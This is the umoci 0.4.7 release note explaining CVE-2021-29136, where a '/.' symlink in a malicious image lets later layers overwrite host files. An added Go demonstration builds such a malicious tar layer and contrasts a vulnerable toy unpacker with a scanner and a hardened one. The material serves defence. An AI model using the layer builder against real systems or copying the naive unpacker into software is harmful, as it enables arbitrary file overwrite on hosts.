umoci 0.4.7
NOTE: This release has a minor bug: umoci --version will report the version as "unknown". This was fixed in #369.
A security flaw was found in umoci, and has been fixed in this release.
If umoci was used to unpack a malicious image (using either
umoci unpack or umoci raw unpack) that contained a symlink entry for /.,
umoci would apply subsequent layers to the target of the symlink
(resolved on the host filesystem). This means that if you ran umoci as
root, a malicious image could overwrite any file on the system (assuming
you didn't have any other access control restrictions). Thanks to Robin
Peraglie from Cure53 for discovering this bug. This issue has been assigned CVE-2021-29136.
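The following Go program is an added illustration of the bug class described above; it is not umoci's code and does not reproduce umoci's actual fix. It builds a constructed tar layer with the shape the advisory describes (a symlink entry for "/." pointing at a host directory, followed by an ordinary file), then runs it through a toy unpacker that models the vulnerable behaviour (unpackNaive), a pre-unpack scanner that flags such entries (rootSymlinkTarget), and a hardened unpacker (unpackSafe) that refuses to let a non-directory entry replace the root and checks, before every write, that the entry's parent still resolves inside the real root. The function names, the toy unpacker's "replace existing path" semantics and the hardened checks are all this example's own assumptions.

```go
package main

import (
	"archive/tar"
	"bytes"
	"errors"
	"fmt"
	"io"
	"os"
	"path/filepath"
	"strings"
)

// buildMaliciousLayer constructs a tar layer (made up for this example, not
// taken from any real image) with the shape the advisory describes: a symlink
// entry for "/." whose target is a host path, followed by an ordinary file.
func buildMaliciousLayer(hostTarget string) []byte {
	var buf bytes.Buffer
	tw := tar.NewWriter(&buf)
	_ = tw.WriteHeader(&tar.Header{Name: "/.", Typeflag: tar.TypeSymlink, Linkname: hostTarget, Mode: 0o777})
	body := []byte("written through the root symlink\n")
	_ = tw.WriteHeader(&tar.Header{Name: "./pwned.txt", Typeflag: tar.TypeReg, Mode: 0o644, Size: int64(len(body))})
	_, _ = tw.Write(body)
	_ = tw.Close()
	return buf.Bytes()
}

// forEachEntry streams the layer's entries to fn, stopping at the first error.
func forEachEntry(layer []byte, fn func(*tar.Header, io.Reader) error) error {
	tr := tar.NewReader(bytes.NewReader(layer))
	for {
		hdr, err := tr.Next()
		if errors.Is(err, io.EOF) {
			return nil
		}
		if err != nil {
			return err
		}
		if err := fn(hdr, tr); err != nil {
			return err
		}
	}
}

// writeEntry places one entry at filepath.Join(root, name). Layer entries
// replace whatever an earlier layer put there, so an existing path is removed
// before a symlink is created. (Toy: missing parent directories are not created.)
func writeEntry(root string, hdr *tar.Header, r io.Reader) error {
	dst := filepath.Join(root, hdr.Name) // "/." joins to root itself
	switch hdr.Typeflag {
	case tar.TypeDir:
		return os.MkdirAll(dst, 0o755)
	case tar.TypeSymlink:
		_ = os.RemoveAll(dst)
		return os.Symlink(hdr.Linkname, dst)
	case tar.TypeReg:
		f, err := os.OpenFile(dst, os.O_CREATE|os.O_WRONLY|os.O_TRUNC, os.FileMode(hdr.Mode))
		if err != nil {
			return err
		}
		defer f.Close()
		_, err = io.Copy(f, r)
		return err
	}
	return fmt.Errorf("unsupported entry type %q", hdr.Typeflag)
}

// unpackNaive models the vulnerable behaviour: no check on what an entry name
// resolves to. The "/." symlink replaces the unpack root with a symlink to the
// host path, and every later entry is written through it onto the host.
func unpackNaive(root string, layer []byte) error {
	return forEachEntry(layer, func(hdr *tar.Header, r io.Reader) error {
		return writeEntry(root, hdr, r)
	})
}

// rootSymlinkTarget is a pre-unpack check: it reports whether the layer has a
// symlink entry that cleans to the root ("/.", "./", ".", "a/.." all do) and
// returns that entry's link target.
func rootSymlinkTarget(layer []byte) (string, bool) {
	var target string
	found := false
	_ = forEachEntry(layer, func(hdr *tar.Header, _ io.Reader) error {
		if hdr.Typeflag == tar.TypeSymlink && filepath.Clean("/"+hdr.Name) == "/" {
			target, found = hdr.Linkname, true
		}
		return nil
	})
	return target, found
}

// unpackSafe refuses to let any non-directory entry replace the root and, as
// defence in depth, verifies before each write that the entry's parent still
// resolves to a path inside the real root, so a symlink planted earlier in the
// layer cannot redirect later entries either.
func unpackSafe(root string, layer []byte) error {
	realRoot, err := filepath.EvalSymlinks(root)
	if err != nil {
		return err
	}
	return forEachEntry(layer, func(hdr *tar.Header, r io.Reader) error {
		rel := filepath.Clean("/" + hdr.Name) // absolute, ".."-free form of the name
		if rel == "/" {
			if hdr.Typeflag == tar.TypeDir {
				return nil // the root already exists; nothing to do
			}
			return fmt.Errorf("refusing to replace unpack root with entry %q", hdr.Name)
		}
		parent, err := filepath.EvalSymlinks(filepath.Dir(filepath.Join(realRoot, rel)))
		if err != nil {
			return err
		}
		if parent != realRoot && !strings.HasPrefix(parent, realRoot+string(os.PathSeparator)) {
			return fmt.Errorf("entry %q escapes the unpack root via %s", hdr.Name, parent)
		}
		return writeEntry(realRoot, hdr, r)
	})
}

func main() {
	naiveRoot, _ := os.MkdirTemp("", "unpack-naive-")
	safeRoot, _ := os.MkdirTemp("", "unpack-safe-")
	host, _ := os.MkdirTemp("", "host-target-")
	defer os.RemoveAll(naiveRoot)
	defer os.RemoveAll(safeRoot)
	defer os.RemoveAll(host)

	layer := buildMaliciousLayer(host)
	if target, ok := rootSymlinkTarget(layer); ok {
		fmt.Printf("scanner: layer has a symlink entry for /. -> %s\n", target)
	}
	fmt.Println("naive unpack error:", unpackNaive(naiveRoot, layer))
	_, err := os.Stat(filepath.Join(host, "pwned.txt"))
	fmt.Println("file landed on the host:", err == nil)
	fmt.Println("safe unpack error:", unpackSafe(safeRoot, layer))
}
```

Run as root against a real image this is exactly the write-anywhere primitive the advisory describes; the scanner is the cheap check to run over untrusted layers, and the parent-resolution check in unpackSafe is the general guard, since the same primitive exists for a symlink at any path that a later entry is written through.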
Other changes in this release:
- umoci now compiles on FreeBSD and appears to work, with the notable limitation that it currently refuses to extract non-Linux images on any platform (this will be fixed in a future release -- see #364). #357